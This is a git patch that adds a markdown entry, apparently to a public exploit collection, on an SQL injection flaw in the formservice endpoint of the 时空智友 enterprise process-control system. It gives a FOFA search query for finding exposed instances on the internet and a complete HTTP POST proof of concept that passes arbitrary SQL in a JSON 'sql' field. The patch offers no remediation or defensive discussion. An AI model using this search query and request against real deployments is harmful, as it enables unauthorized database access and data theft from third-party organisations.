From 813e381e8ca0f1481641e5bdc88366f419dd3033 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 19 Apr 2024 22:18:26 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=97=B6=E7=A9=BA=E6=99=BA=E5=8F=8B?= =?UTF-8?q?=E4=BC=81=E4=B8=9A=E6=B5=81=E7=A8=8B=E5=8C=96=E7=AE=A1=E6=8E=A7?= =?UTF-8?q?=E7=B3=BB=E7=BB=9Fformservice=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...业流程化管控系统formservice存在SQL注入漏洞.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 时空智友企业流程化管控系统formservice存在SQL注入漏洞.md diff --git a/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md b/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md new file mode 100644 index 0000000..1a8faf9 --- /dev/null +++ b/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +## 时空智友企业流程化管控系统formservice存在SQL注入漏洞 + + +## fofa +``` +body="企业流程化管控系统" && body="密码(Password):" +``` + + +## poc +``` +POST /formservice?service=workflow.sqlResult HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 +Connection: keep-alive +Content-Type: application/json +Accept-Encoding: gzip +Content-Length: 50 + +{"params":{"a":"11"},"sql":"select @@version"} +```